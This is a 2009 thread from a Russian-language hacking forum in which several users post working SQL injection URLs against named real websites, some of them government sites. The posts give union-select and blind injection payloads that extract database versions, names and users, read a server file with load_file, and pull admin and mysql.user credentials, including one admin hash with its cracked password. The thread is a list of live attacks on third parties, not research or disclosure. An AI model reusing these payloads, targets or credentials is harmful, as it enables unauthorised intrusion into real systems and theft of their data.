ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #8671  
Старый 01.04.2009, 18:50
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

PR5
http://www.sundaystandard.info/news/news_item.php?NewsID=3302&GroupID=3+and+substring(y(),1,1)=x

y1=version
y2=database
y3=user


x=Version: 5.0.67-community-log
Database : sundaysf_ss
User : sundaysf_ss@localhost
 
Ответить с цитированием

  #8672  
Старый 01.04.2009, 18:54
InFlame
Участник форума
Регистрация: 27.10.2008
Сообщений: 215
Провел на форуме:
810079

Репутация: 90
По умолчанию

Target: www.nasr.com.au

Evil link: http://www.nasr.com.au/release.asp?NewsId=-31152+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21--

Version: 4.1.22-community-nt
database: snet
user: root@localhost
OS: Windows Server 2003


Чтение файлов:
http://www.nasr.com.au/release.asp?NewsId=-31152+union+select+1,2,3,4,5,6,7,load_file(0x633a5c626f6f742e696e69),9,10,11,12,13,14,15,16,17,18,19,20,21--
Где 0x633a5c626f6f742e696e69 - это c:\boot.ini в hex-представлении.
 
Ответить с цитированием

  #8673  
Старый 01.04.2009, 19:01
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

PR5

http://www.traffictechnologytoday.com/news.php?NewsID=-11440+union+select+1,2,3,concat_ws(0x3a,version(), database(),useR()),5,6,7,8,9,10


Database Version: 4.1.15-Debian_0.dotdeb.4-log
Database name: passenger
User name: passenger01@62.128.157.148


PR6
http://www.tropicalforesttrust.com/news-detail.php?newsid=-74+union+select+1,2,3,concat_ws(0x3a,version(),dat abase(),useR()),5,6,7,8,9,10,11,12,13,14


Database Version: 4.0.27-standard-log
Database name: db200813045
User name: dbo200813045@212.227.114.142
 
Ответить с цитированием

  #8674  
Старый 01.04.2009, 19:17
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134

Репутация: 519


Отправить сообщение для -m0rgan- с помощью ICQ
По умолчанию

Код:
http://www.sottoilmare.it/archivionews.php?getid=-1+union+all+select+0,1,concat_ws(user(),version(),database()),3,4,5,6,7--+
юзер/версия/бд:

Код:
4.1.23-pro-gpl-logMV2696_sim@81.88.49.17sottoilmare_it_data
----------------------------------------------------------------------

Код:
http://www.senor.es/ingles/ver_novedades.php?idn=-1+union+all+select+concat_ws(user(),version(),database()),1,2,3,4--
юзер/версия/бд:

Код:
5.0.45-community-ntsenor_usuario@localhostsenorbd
---------------------------------------------------------------------

Код:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=-1+union+all+select+0,1,concat_ws(user(),version(),database()),3,4,5,6,7,8,9,10--
юзер/версия/бд:

Код:
5.0.4532908_user116602@lnh-util.bluehalo.myregisteredsite.com32908_leadacidbatteryinfoorg
----------------------------------------------------------------------------------------
The End!
 
Ответить с цитированием

  #8675  
Старый 01.04.2009, 19:20
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

PR6
http://www.ethanol.org/news/index.php?newsid=-25+union+select+1,2,concat_ws(0x3a,version(),datab ase(),useR()),4,5,6,7,8


Database Version: 5.0.77-community
Database name: ethanol_ethanol
User name: ethanol_ethanol@localhost
 
Ответить с цитированием

  #8676  
Старый 01.04.2009, 19:24
f1ng3r
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
Провел на форуме:
1936181

Репутация: 688
Отправить сообщение для f1ng3r с помощью ICQ
По умолчанию

Код:
http://www.uniteck.ru/?type=-560+union+select+1,2,3,concat_ ws(0x3a,version(),database(),user()),5,6,7,8--
Database Version : 5.0.41-log
Database name : uniteck
User name : uniteck@cub.mplik.ru



админ :


Код:
http://www.uniteck.ru/?type=-560+union+select+1,2,3,concat_ws(0x3a,logi n,pass),5,6,7,8+from+user--
Код:
admin:683a6aad2b7543f113cf2ba32b42c2d8 - 1972oxa
вход с сайта

Последний раз редактировалось f1ng3r; 01.04.2009 в 19:27..
 
Ответить с цитированием

  #8677  
Старый 01.04.2009, 19:39
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

PR5
http://www.gaspowered.com/newsletters.php?newsID=20+AND+ASCII(SUBSTRING((sel ect+y()),1,1))>x--

y1=version
y2=database
y3=user

x1=53,46,48,46,53,49,97,45,99,111,109,109,117,110,10 5,116,121,45,108,111,103
x2=103,97,115,112,111,119,101,114
x3=103,97,115,112,111,119,101,114,64,108,111,99,97,1 08,104,111,115,116


Version : 5.0.51a-community-log
Database : gaspower
User : gaspower@localhost


PR4
http://www.ootpdevelopments.com/article.php?newsid=396+AND+SUBSTRING((y())1,1))=x

x=Version : 5.0.26
Database : misc
User : ootpdevmisc@localhost
 
Ответить с цитированием

  #8678  
Старый 01.04.2009, 19:43
M.W.N.N.
Участник форума
Регистрация: 05.01.2009
Сообщений: 191
Провел на форуме:
3020589

Репутация: 240
По умолчанию

Код:
http://www.pna.gov.ph/index.php?idn=1&sid=&nid=1&rid=79746+union+select+1,2,3,concat(version(),0x3a,database(),0x3a,user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/*
version()4.0.20a-nt
database():test
user():root@localhost
Код:
http://www.pna.gov.ph/index.php?idn=1&sid=&nid=1&rid=79746+union+select+1,2,3,concat(user,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+mysql.user/*
__
Код:
http://www.contraloriabarrancabermeja.gov.co/article.php?sid=5+union+select+1,2,3,4,5,6,7,8,9,10,11

Последний раз редактировалось M.W.N.N.; 01.04.2009 в 19:51..
 
Ответить с цитированием

  #8679  
Старый 01.04.2009, 20:07
sarmat2009
Новичок
Регистрация: 20.03.2009
Сообщений: 2
Провел на форуме:
57668

Репутация: 2
По умолчанию

http://www.ftsr.ru

http://www.ftsr.ru/news.php?news_id=-1+union+select+1,2,concat(0x3a,da tabase(),0x3a,user(),0x3a,version()),4,5,6,7--

ftsr139_2007
ftsr139_2007@v26.valuehost.ru
mysql 4.0.27-log

Последний раз редактировалось sarmat2009; 01.04.2009 в 23:17..
 
Ответить с цитированием

  #8680  
Старый 01.04.2009, 20:21
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

PR3
http://www.comeraghcc.com/DisplayArticle.php?newsID=-216+union+select+1,concat_ws(0x3a,version(),databa se(),useR()),3,4,5,6,7,8

Database Version: 5.0.51a-community
Database name: comerag_Comeragh
User name: comerag_cathal@localhost



PR3
http://architectureinc.com/news/index.php?newsid=-69+union+select+1,2,concat_ws(0x3a,version(),datab ase(),useR()),4,5,6,7,8

Database Version: 5.0.45
Database name: architectureincdb
User name: architectureinc@localhost



PR3

http://www.prairieberry.com/news/index.php?newsid=-19+union+select+1,2,concat_ws(0x3a,version(),datab ase(),useR()),4,5,6,7,8,9


Database Version: 5.0.45
Database name: prairieberrydb
User name: prairieberry@localhost

Последний раз редактировалось Gorev; 01.04.2009 в 20:36..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ